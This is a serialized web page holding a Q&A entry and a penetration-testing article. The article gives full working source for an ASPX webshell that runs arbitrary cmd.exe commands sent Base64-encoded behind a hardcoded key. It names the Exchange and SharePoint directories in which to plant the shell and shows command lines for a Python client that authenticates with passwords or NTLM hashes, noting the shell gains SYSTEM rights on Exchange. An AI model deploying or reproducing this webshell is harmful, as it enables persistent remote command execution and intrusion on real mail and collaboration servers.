[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fimyT7fgzpZ35V2Pua27BYYz2rG9PMlq0YIy_1AC_Iyw":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":51,"createdAt":51,"_status":50},1204,"How does the executCmd.aspx page verify authentication and execute commands?","The `execCmd.aspx` page uses the `Page_Load` method to capture two POST form parameters: `data1` (Auth Key) and `data2` (Base64-encoded command). It compares `data1` against a hardcoded Base64 string (e.g., `UGFzc3dvcmQxMjM0NTY3ODk`); if mismatched, it returns nothing. If verified, it decodes `data2`, runs the command via `cmd.exe \u002Fc`, and returns the output as a Base64-encoded string. This design ensures that only authorized scripts can interact with the webshell, as detailed in the [article's script development section](\u002Fnews\u002Fpenetration-basics-implementation-of-webshell-supporting-ntlm-over-http-protocol).","\u003Cp>The `execCmd.aspx` page uses the `Page_Load` method to capture two POST form parameters: `data1` (Auth Key) and `data2` (Base64-encoded command). It compares `data1` against a hardcoded Base64 string (e.g., `UGFzc3dvcmQxMjM0NTY3ODk`); if mismatched, it returns nothing. If verified, it decodes `data2`, runs the command via `cmd.exe \u002Fc`, and returns the output as a Base64-encoded string. This design ensures that only authorized scripts can interact with the webshell, as detailed in the [article&#39;s script development section](\u002Fnews\u002Fpenetration-basics-implementation-of-webshell-supporting-ntlm-over-http-protocol).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-basics-implementation-of-webshell-supporting-ntlm-over-http-protocol\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-does-the-executcmdaspx-page-verify-authentication-and-execute-commands-1777480112297","execCmd.aspx, Auth Key, Base64, Page_Load, Form POST, command execution",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":47,"updatedAt":48,"createdAt":49,"_status":50},292,"Penetration Basics - Implementation of Webshell Supporting NTLM Over HTTP Protocol","penetration-basics-implementation-of-webshell-supporting-ntlm-over-http-protocol","Learn to implement a webshell supporting NTLM Over HTTP for command-line use in environments like Exchange and SharePoint. Includes code and design details.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In certain environments, accessing resources on a web server requires NTLM authentication via the NTLM Over HTTP protocol. When using a webshell on such a web server, we not only need to consider the implementation of NTLM authentication but also ensure it can be used from the command line.\u003C\u002Fp>\u003Cp>This article introduces an implementation method solely from a technical research perspective, providing open-source code and sharing script development details.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Design Approach\u003C\u002Fli>\u003Cli>Script Development Details\u003C\u002Fli>\u003Cli>Open-Source Code\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Design Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>There are many web servers that use NTLM authentication via the NTLM Over HTTP protocol. Here, Exchange and SharePoint are used as examples.\u003C\u002Fp>\u003Cp>(1) Exchange Test Environment\u003C\u002Fp>\u003Cp>Absolute path for file saving:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\Autodiscover\\test.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding URL is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>https:\u002F\u002FURL\u002FAutodiscover\u002Ftest.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) SharePoint test environment\u003C\u002Fp>\u003Cp>Absolute path for file saving:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS\\test.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding URL is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http:\u002F\u002FURL\u002F_layouts\u002F15\u002Ftest.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Accessing test.aspx requires NTLM authentication via NTLM Over HTTP protocol\u003C\u002Fp>\u003Cp>Here, a webshell supporting cmd commands is used as an example for testing, the webshell address is:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ftennc\u002Fwebshell\u002Fblob\u002Fmaster\u002Faspx\u002Fasp.net-backdoors\u002Fcmdexec.aspx\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016711098_0_0f3e5e7f09.jpeg\">\u003C\u002Fp>\u003Cp>This webshell needs to be operated through a browser, first complete NTLM authentication, then fill in the correct Auth Key and the cmd command to execute\u003C\u002Fp>\u003Cp>Our goal is to meet the requirement of being usable from the command line, allowing modifications based on this template. The design approach is as follows:\u003C\u002Fp>\u003Cp>(1) execCmd.aspx\u003C\u002Fp>\u003Cp>Receives Form POST requests as parameters and verifies the Auth Key.\u003C\u002Fp>\u003Cp>If verification fails, returns an empty result.\u003C\u002Fp>\u003Cp>If verification succeeds, executes the passed cmd command and returns the execution result.\u003C\u002Fp>\u003Cp>(2) aspxCmdNTLM.py\u003C\u002Fp>\u003Cp>Command-line script.\u003C\u002Fp>\u003Cp>First, completes NTLM authentication via the NTLM Over HTTP protocol, requiring support for both plaintext and user password hash login methods.\u003C\u002Fp>\u003Cp>Sends the Auth Key and the cmd command to execute via a Form POST request, and receives the cmd command's execution result.\u003C\u002Fp>\u003Cp>The communication content between execCmd.aspx and aspxCmdNTLM.py is Base64 encoded; the program implementation must consider Base64 encoding and decoding.\u003C\u002Fp>\u003Ch2>0x03 Script Development Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. execCmd.aspx\u003C\u002Fh3>\u003Cp>Uses the Page_Load method to receive Form POST requests, where data1 is used as the Auth Key and data2 is used as the cmd command.\u003C\u002Fp>\u003Cp>Implementation of Base64 encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>byte[] enbytes = Encoding.Default.GetBytes(string1);\u003Cbr>string string2 = Convert.ToBase64String(enbytes);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Implementation of Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>byte[] outbyte = Convert.FromBase64String(string1);\u003Cbr>string string2 = Encoding.Default.GetString(outbyte);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The complete implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>&lt;%@ Page Language=\"C#\"%&gt;\u003Cbr>&lt;%@ Import namespace=\"System.Diagnostics\"%&gt;\u003Cbr>&lt;%@ Import Namespace=\"System.IO\"%&gt;\u003Cbr>\u003Cbr>\u003Cscript runat=\"server\">\u003Cbr>    private const string AUTHKEY = \"UGFzc3dvcmQxMjM0NTY3ODk\";\u003Cbr>    protected void Page_Load(object sender, EventArgs e)\u003Cbr>    {    \u003Cbr>        string data1 = Request.Form[\"data1\"];\u003Cbr>        if (data1 != AUTHKEY)\u003Cbr>        {          \u003Cbr>            return;\u003Cbr>        }\u003Cbr>        string data2 = Request.Form[\"data2\"];\u003Cbr>        byte[] outbyte = Convert.FromBase64String(data2);\u003Cbr>        string payload = Encoding.Default.GetString(outbyte);              \u003Cbr>        string outstr1 = ExecuteCommand(payload);\u003Cbr>        byte[] enbytes = Encoding.Default.GetBytes(outstr1);\u003Cbr>        string outstr2 = Convert.ToBase64String(enbytes);\u003Cbr>        Response.Write(outstr2);\u003Cbr>    }\u003Cbr>\u003Cbr>    private string ExecuteCommand(string command)\u003Cbr>    {\u003Cbr>        try\u003Cbr>        {\u003Cbr>            ProcessStartInfo processStartInfo = new ProcessStartInfo();\u003Cbr>            processStartInfo.FileName = \"cmd.exe\";\u003Cbr>            processStartInfo.Arguments = \"\u002Fc \" + command;\u003Cbr>            processStartInfo.RedirectStandardOutput = true;\u003Cbr>            processStartInfo.UseShellExecute = false;\u003Cbr>            Process process = Process.Start(processStartInfo);\u003Cbr>            using (StreamReader streamReader = process.StandardOutput)\u003Cbr>            {\u003Cbr>                string ret = streamReader.ReadToEnd();\u003Cbr>                return ret;\u003Cbr>            }\u003Cbr>        }\u003Cbr>        catch (Exception ex)\u003Cbr>        {\u003Cbr>            return ex.ToString();\u003Cbr>        }\u003Cbr>    }\u003Cbr>\u003C\u002Fscript>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2.aspxCmdNTLM.py\u003C\u002Fh3>\u003Cp>The implementation of NTLM authentication can refer to the previous code:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Supports both plaintext and user password hash login methods\u003C\u002Fp>\u003Cp>Form requests are sent via POST method\u003C\u002Fp>\u003Cp>Base64 encoding and decoding require attention to string format\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>execCmd.aspx needs to be saved on the Web server\u003C\u002Fp>\u003Cp>aspxCmdNTLM.py is executed in the command line, connecting to execCmd.aspx to execute cmd commands and obtain results\u003C\u002Fp>\u003Cp>aspxCmdNTLM.py supports both plaintext and user password hash login methods\u003C\u002Fp>\u003Cp>For Exchange servers, the corresponding webshell permissions are System\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016716036_1_5b3a9ffced.jpeg\">\u003C\u002Fp>\u003Cp>Can directly call Exchange PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python aspxCmdNTLM.py 192.168.1.1 443 https:\u002F\u002F192.168.1.1\u002FAutodiscover\u002FexecCmd.aspx plaintext test.com user1 Password123! \"powershell -c \\\"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;;Get-MailboxServer\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016721008_2_eae2cdd8ec.jpeg\">\u003C\u002Fp>\u003Cp>For SharePoint servers, the corresponding webshell permissions are user permissions\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016727431_3_895c5e0632.jpeg\">\u003C\u002Fp>\u003Cp>Can attempt to call SharePointServer PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python aspxCmdNTLM.py 192.168.1.1 443 https:\u002F\u002F192.168.1.1\u002FAutodiscover\u002FexecCmd.aspx plaintext test.com user1 Password123! \"powershell -c \\\"Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPSite\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It should be noted here that the user needs to be configured to have access to the database in order to execute SharePointServer PowerShell commands\u003C\u002Fp>\u003Cp>The corresponding PowerShell command to view the list of users with database access is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.SharePoint.PowerShell;\u003Cbr>Get-SPShellAdmin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to grant database access permissions to a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.SharePoint.PowerShell;\u003Cbr>Add-SPShellAdmin Domain\\User1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to remove database access permissions from a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.SharePoint.PowerShell;\u003Cbr>Remove-SPShellAdmin Domain\\User1 -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Normal results are shown in the following figure:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770016731512_4_accc224cce.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article uses Exchange and SharePoint as examples to introduce the implementation approach of Webshells supporting the NTLM Over HTTP protocol, provides open-source code, and shares script development details.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In certain environments, accessing resources on a web server requires NTLM authentication via the NTLM Over HTTP protocol. When using a webshell on such a web server, we not only need to consider the implementation of NTLM authentication but also ensure it can be used from the command line.\u003C\u002Fp>\u003Cp>This article introduces an implementation method solely from a technical research perspective, providing open-source code and sharing script development details.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Design Approach\u003C\u002Fli>\u003Cli>Script Development Details\u003C\u002Fli>\u003Cli>Open-Source Code\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Design Approach\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>There are many web servers that use NTLM authentication via the NTLM Over HTTP protocol. Here, Exchange and SharePoint are used as examples.\u003C\u002Fp>\u003Cp>(1) Exchange Test Environment\u003C\u002Fp>\u003Cp>Absolute path for file saving:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\Autodiscover\\test.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding URL is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>https:\u002F\u002FURL\u002FAutodiscover\u002Ftest.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) SharePoint test environment\u003C\u002Fp>\u003Cp>Absolute path for file saving:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>C:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\15\\TEMPLATE\\LAYOUTS\\test.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding URL is:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>http:\u002F\u002FURL\u002F_layouts\u002F15\u002Ftest.aspx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Accessing test.aspx requires NTLM authentication via NTLM Over HTTP protocol\u003C\u002Fp>\u003Cp>Here, a webshell supporting cmd commands is used as an example for testing, the webshell address is:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Ftennc\u002Fwebshell\u002Fblob\u002Fmaster\u002Faspx\u002Fasp.net-backdoors\u002Fcmdexec.aspx\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016711098_0_0f3e5e7f09-1.jpeg\">\u003C\u002Fp>\u003Cp>This webshell needs to be operated through a browser, first complete NTLM authentication, then fill in the correct Auth Key and the cmd command to execute\u003C\u002Fp>\u003Cp>Our goal is to meet the requirement of being usable from the command line, allowing modifications based on this template. The design approach is as follows:\u003C\u002Fp>\u003Cp>(1) execCmd.aspx\u003C\u002Fp>\u003Cp>Receives Form POST requests as parameters and verifies the Auth Key.\u003C\u002Fp>\u003Cp>If verification fails, returns an empty result.\u003C\u002Fp>\u003Cp>If verification succeeds, executes the passed cmd command and returns the execution result.\u003C\u002Fp>\u003Cp>(2) aspxCmdNTLM.py\u003C\u002Fp>\u003Cp>Command-line script.\u003C\u002Fp>\u003Cp>First, completes NTLM authentication via the NTLM Over HTTP protocol, requiring support for both plaintext and user password hash login methods.\u003C\u002Fp>\u003Cp>Sends the Auth Key and the cmd command to execute via a Form POST request, and receives the cmd command's execution result.\u003C\u002Fp>\u003Cp>The communication content between execCmd.aspx and aspxCmdNTLM.py is Base64 encoded; the program implementation must consider Base64 encoding and decoding.\u003C\u002Fp>\u003Ch2>0x03 Script Development Details\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. execCmd.aspx\u003C\u002Fh3>\u003Cp>Uses the Page_Load method to receive Form POST requests, where data1 is used as the Auth Key and data2 is used as the cmd command.\u003C\u002Fp>\u003Cp>Implementation of Base64 encoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>byte[] enbytes = Encoding.Default.GetBytes(string1);\u003Cbr>string string2 = Convert.ToBase64String(enbytes);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Implementation of Base64 decoding:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>byte[] outbyte = Convert.FromBase64String(string1);\u003Cbr>string string2 = Encoding.Default.GetString(outbyte);\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The complete implementation code is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>&lt;%@ Page Language=\"C#\"%&gt;\u003Cbr>&lt;%@ Import namespace=\"System.Diagnostics\"%&gt;\u003Cbr>&lt;%@ Import Namespace=\"System.IO\"%&gt;\u003Cbr>\u003Cbr>\u003Cscript runat=\"server\">\u003Cbr>    private const string AUTHKEY = \"UGFzc3dvcmQxMjM0NTY3ODk\";\u003Cbr>    protected void Page_Load(object sender, EventArgs e)\u003Cbr>    {    \u003Cbr>        string data1 = Request.Form[\"data1\"];\u003Cbr>        if (data1 != AUTHKEY)\u003Cbr>        {          \u003Cbr>            return;\u003Cbr>        }\u003Cbr>        string data2 = Request.Form[\"data2\"];\u003Cbr>        byte[] outbyte = Convert.FromBase64String(data2);\u003Cbr>        string payload = Encoding.Default.GetString(outbyte);              \u003Cbr>        string outstr1 = ExecuteCommand(payload);\u003Cbr>        byte[] enbytes = Encoding.Default.GetBytes(outstr1);\u003Cbr>        string outstr2 = Convert.ToBase64String(enbytes);\u003Cbr>        Response.Write(outstr2);\u003Cbr>    }\u003Cbr>\u003Cbr>    private string ExecuteCommand(string command)\u003Cbr>    {\u003Cbr>        try\u003Cbr>        {\u003Cbr>            ProcessStartInfo processStartInfo = new ProcessStartInfo();\u003Cbr>            processStartInfo.FileName = \"cmd.exe\";\u003Cbr>            processStartInfo.Arguments = \"\u002Fc \" + command;\u003Cbr>            processStartInfo.RedirectStandardOutput = true;\u003Cbr>            processStartInfo.UseShellExecute = false;\u003Cbr>            Process process = Process.Start(processStartInfo);\u003Cbr>            using (StreamReader streamReader = process.StandardOutput)\u003Cbr>            {\u003Cbr>                string ret = streamReader.ReadToEnd();\u003Cbr>                return ret;\u003Cbr>            }\u003Cbr>        }\u003Cbr>        catch (Exception ex)\u003Cbr>        {\u003Cbr>            return ex.ToString();\u003Cbr>        }\u003Cbr>    }\u003Cbr>\u003C\u002Fscript>\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>2.aspxCmdNTLM.py\u003C\u002Fh3>\u003Cp>The implementation of NTLM authentication can refer to the previous code:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>Supports both plaintext and user password hash login methods\u003C\u002Fp>\u003Cp>Form requests are sent via POST method\u003C\u002Fp>\u003Cp>Base64 encoding and decoding require attention to string format\u003C\u002Fp>\u003Cp>The complete code has been uploaded to GitHub, address as follows:\u003C\u002Fp>\u003Cp>An open-source project\u003C\u002Fp>\u003Cp>execCmd.aspx needs to be saved on the Web server\u003C\u002Fp>\u003Cp>aspxCmdNTLM.py is executed in the command line, connecting to execCmd.aspx to execute cmd commands and obtain results\u003C\u002Fp>\u003Cp>aspxCmdNTLM.py supports both plaintext and user password hash login methods\u003C\u002Fp>\u003Cp>For Exchange servers, the corresponding webshell permissions are System\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016716036_1_5b3a9ffced-1.jpeg\">\u003C\u002Fp>\u003Cp>Can directly call Exchange PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python aspxCmdNTLM.py 192.168.1.1 443 https:\u002F\u002F192.168.1.1\u002FAutodiscover\u002FexecCmd.aspx plaintext test.com user1 Password123! \"powershell -c \\\"Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;;Get-MailboxServer\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Result as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016721008_2_eae2cdd8ec-1.jpeg\">\u003C\u002Fp>\u003Cp>For SharePoint servers, the corresponding webshell permissions are user permissions\u003C\u002Fp>\u003Cp>As shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016727431_3_895c5e0632-1.jpeg\">\u003C\u002Fp>\u003Cp>Can attempt to call SharePointServer PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python aspxCmdNTLM.py 192.168.1.1 443 https:\u002F\u002F192.168.1.1\u002FAutodiscover\u002FexecCmd.aspx plaintext test.com user1 Password123! \"powershell -c \\\"Add-PSSnapin Microsoft.SharePoint.PowerShell;Get-SPSite\\\"\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>It should be noted here that the user needs to be configured to have access to the database in order to execute SharePointServer PowerShell commands\u003C\u002Fp>\u003Cp>The corresponding PowerShell command to view the list of users with database access is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.SharePoint.PowerShell;\u003Cbr>Get-SPShellAdmin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to grant database access permissions to a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.SharePoint.PowerShell;\u003Cbr>Add-SPShellAdmin Domain\\User1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The PowerShell command to remove database access permissions from a specified user is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-PSSnapin Microsoft.SharePoint.PowerShell;\u003Cbr>Remove-SPShellAdmin Domain\\User1 -Confirm:$false\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Normal results are shown in the following figure:\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770016731512_4_accc224cce-1.jpeg\">\u003C\u002Fp>\u003Ch2>0x04 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article uses Exchange and SharePoint as examples to introduce the implementation approach of Webshells supporting the NTLM Over HTTP protocol, provides open-source code, and shares script development details.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",9,"Onedaysec",4,"published","2026-02-02T07:25:19.684Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Webshell with NTLM Over HTTP: Command-Line Implementation Guide","webshell, NTLM authentication, HTTP protocol, command-line, penetration testing, Exchange, SharePoint, aspx, security research",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46],1206,1205,1203,{"title":39,"description":39,"image":39},"2026-07-24T15:37:08.883Z","2026-07-23T16:02:40.169Z","draft","2026-07-23T16:17:23.625Z"]